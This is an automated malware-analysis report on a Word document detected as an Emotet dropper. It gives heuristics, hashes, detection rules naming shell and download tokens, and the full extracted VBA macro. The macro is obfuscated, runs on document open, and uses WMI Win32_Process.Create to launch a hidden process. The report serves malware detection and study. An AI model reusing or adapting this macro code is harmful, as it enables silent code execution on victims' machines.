Office (OOXML) malware analysis — malicious · d1af60917e75a75b

MALICIOUS

Office (OOXML)

121.3 KB Created: 2020-01-24 13:26:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-12

MD5: ab338c6b871c54d3f1024222ee893563 SHA-1: e90cc8786e68186b0fd0d4b5392000aa02c21ee0 SHA-256: d1af60917e75a75b141934992c69fa10d5ef043a6606459033d38de4f602a207

230 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Emotet-7560777-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-7560777-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Bbugostaho = GetObject(Ztjbpzdcj)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	16228 bytes
SHA-256: `c9a5bcf7aab85f75abb436e231f06499aa0a05915c9ed8459c2a2dd6109258f2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Rzsjqkhszs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Call Vvwtnvne End Sub Attribute VB_Name = "Gfikxsin" Attribute VB_Base = "0{01414DD5-BA34-4047-A39D-B14269963C81}{EDE91F8E-F86F-4377-B5ED-E4146C7BED0A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ikcdjpmvxidv" Attribute VB_Base = "0{985D7DA1-D70F-4B2C-8105-F05A834FB6EF}{29DD0D43-C904-48F8-9391-AFAA3B41F816}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Uycrjtygyma() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Vtwqqkltjl" Attribute VB_Base = "0{0432FAA0-583B-4F73-8194-5FE6F7653313}{4BF81B18-D452-442B-A2BB-64AE80786F0C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Pfvfcrdmrcfqq() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Tcmpdeerbasml" Attribute VB_Base = "0{A8585D5C-618B-43D9-876B-81CE6F99CB05}{7431FF49-1FD9-4CB0-8BFC-ADB0F2946010}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Knlstodawvwst() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Gzunrqxvntl" Attribute VB_Base = "0{04EE714B-282C-4667-97AC-D5ACC523B379}{6CA4BA19-F470-476E-8A2F-620F289B6739}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ejfsvtrsexdj() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qugmkxou" Attribute VB_Base = "0{9D207E72-9AFF-4000-9B02-3E6E88C19BEB}{F90A31ED-FA06-45E5-A1C7-06D040775608}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Yzhnsyyizjvm() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Xabubcqdb" Attribute VB_Base = "0{901C7D4B-F490-4610-81FF-AD8322AA4E11}{EE73D3C1-6769-412B-9C3F-A00A085AE4E7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Aghaqejrn() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Leagyujggdeco" Attribute VB_Base = "0{FE670202-72CF-4228-8B5F-D8DC67837919}{DF861536-133F-4FEB-807F-4549E943F38F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ttpbuxtgrrrhi() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Vckapxuvev" Attribute VB_Base = "0{CB532C14-B020-4A55-8C59-D000649130B3}{17FE54AF-3045-498E-BF55-FAC6211C3401}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Hdwespulqbmz() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Xjohnbcuicro" Attribute VB_Base = "0{99E21C2E-BC95-4BC9-90B8-E97780831331}{1D10E436-5DDC-471C-86E4-78B8C0F64D2C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Zxlfadmdumysn() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Tqkcxzlgxiss" Attribute VB_Base = "0{1FD68A52-3274-40BA-A9C2-9CC191BFB65C}{0D6F278D-4AFC-4537-8AB2-78379FA086F2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Uneuwmtqgzvf() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ciunizolhlx" Attribute VB_Base = "0{86954F9A-AC58-4966-9624-F34231DE9E93}{180959C7-99E2-4B0C-86FB-4EE26C58CB15}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Qowikzjazty() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Bdjlhsfxe" Attribute VB_Base = "0{75EE2258-CB11-4F1F-AAE1-DBCC324B64AE}{7C6436CE-5288-43B5-90ED-3ED253E44D4B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ejnfifswxyc() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qkflncpwvb" Attribute VB_Base = "0{78175A43-3A8C-4007-AD56-6715E41C9021}{A301B793-CDB1-4239-9A39-75B5901A1AC8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Bvefspmzid() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Drtabtiybz" Attribute VB_Base = "0{E6F35FF1-E0DD-4940-8E8B-E36D900C640B}{0ED00C9D-FA45-4E67-875E-4D032C25C1F9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Mujbzriipugko() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Iqccniuhv" Attribute VB_Base = "0{71C93687-67AC-4993-A544-8EF0B9B0F565}{DDDB838C-8A5B-4041-ABA8-471C496C291A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Ucsyicbhsyf() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qusvikjm" Attribute VB_Base = "0{2DF8FC9E-6D20-4C00-8922-A5B55B8A8387}{2BDF65C6-F125-432C-9FEF-01750D346FD4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Aizwhosnosl() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qrleihxgc" Attribute VB_Base = "0{851A4B22-C45E-4382-8824-0555E6D89D81}{7471C1CE-628C-4688-AFB1-A1E66507487F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Lsqyzkzc() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Sqjfttakrr" Attribute VB_Base = "0{C124337C-9361-493D-94A1-49C2DB2AD2EC}{C09218DC-DE16-4C3D-93CA-466DFD81E555}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Obewgafnixbx() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Xtndtintyac" Attribute VB_Base = "0{D59B004C-CAA9-4317-84E5-2F8383A28C43}{1DC52445-E622-491C-9CA2-57E0E3B8C71F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Nxvkonreouc() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Wweuomuevhwox" Attribute VB_Base = "0{4666AD5A-D619-44B3-BB31-5F495B0E3D50}{ED755C0E-BD4E-4B57-A242-26412ABBD0CC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Udduilrpm() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Ktkjylzulrp" Attribute VB_Base = "0{15699A88-21C3-4370-9FE0-51F457911268}{4F69CCA4-2E8E-4D76-9581-FBC726067ADF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Qdksqywqgl() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Qivnfgsibc" Attribute VB_Base = "0{32C906AB-E30C-4B50-B7B3-460D6087851C}{91E6F364-7DEA-4F3B-8395-C68BE5F8E466}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Milpdupfzrde() Debug.Print "Pizdec" End Sub Attribute VB_Name = "Tyufxvomh" Function Wdrcxogozlij() While Wlnnpnnyllqbh = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Rhaazematcaq = ChrW(owdsd + wdKeyP + kwm) While Sfpkwssdm = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Bksktlso = Rhaazematcaq + Gfikxsin.Yohkenlpcjqw + Gfikxsin.Mebwvwzo While Oymsybuufcn = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) omwn = Gfikxsin.Ohquhxdxfnj.ControlTipText Oohpcnplimh = Split(Bksktlso + CVar(StrReverse(omwn)), "i_^^najks===///") While Syieowcwoa = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Wdrcxogozlij = Join(Oohpcnplimh, "") While Qhrucazdakp = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) End Function Function Vvwtnvne() mdnuuw = "i_^^najks===///i_^^najks===///ii_^^najks===///ni_^^najks===///mi_^^najks===///gi_^^najks===///mti_^^najks===///" + ChrW(nsiq + wdKeyS + ienosmc) + ":i_^^najks===///i_^^najks===///wii_^^najks===///i_^^najks===///n3i_^^najks===///2_i_^^najks===///i_^^najks===///" + Gfikxsin.Vzuvsusnjo + "i_^^najks===///roci_^^najks===///i_^^najks===///esi_^^najks===///si_^^najks===///i_^^najks===///" While Arojyclpt = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) ienloqw = "i_^^najks===///" While Jjuwrmee = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Abrmdpwnz = Split("i_^^najks===///wi_^^najks===///i_^^najks===///i_^^najks===///" + mdnuuw + mmnnnsde, ienloqw) While Ktrcbanatfypt = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Ztjbpzdcj = Join(Abrmdpwnz, "") While Haynlqhciod = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Set Bbugostaho = GetObject(Ztjbpzdcj) While Btykpzpcv = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Wxxgnoiotz = Gfikxsin.Mxsjhiwa.Tag Jezjjcbzs = Ztjbpzdcj + ChrW(mmsnu + wdKeyS) + Gfikxsin.Roaunuyqp.Tag + Wxxgnoiotz While Itrgdhrs = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Wayohgkltv = Jezjjcbzs + Gfikxsin.Vzuvsusnjo While Jaybazst = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Set Vvwtnvne = GetObject(Wayohgkltv) While Ilxrgbcjs = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Vvwtnvne. _ SHoWwiNDow! = False While Hfdafzejfef = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) Do While Bbugostaho. _ Create(mxuws & Wdrcxogozlij, Tltgqwyaeydt, Vvwtnvne, Tyroaignvofg, Tislljecf, Olbdkdwwaii, Gimgqfbj, Hvgshmpqszx, Fklkijnaleoed, Marggvuhdkokl) Loop While Ihpsubgvr = 1 dewe = erter _ / zMb - (3 / CInt(wef) _ * cGRmgD7 / 8) Wend weff = reter - 1 zeOIdc0 = 3 * Fix(4 + Fix(jTkM)) _ * pgm - CSng(3 + 9) * KNhb87 / Oct(64) - 8 - Cos(6) ugRn1 = (mupr8 * gGEBrp4m) - 7 - (fwe _ / 5 + 256 * Sin(61)) - tAId5 * (BWho0E * kADe) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	115200 bytes
SHA-256: `f80c76dc9383529c74ed5536d104da6b6583cefde3405e9976f7275e01ab1062`
Detection ClamAV: Doc.Dropper.Emotet-7560777-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.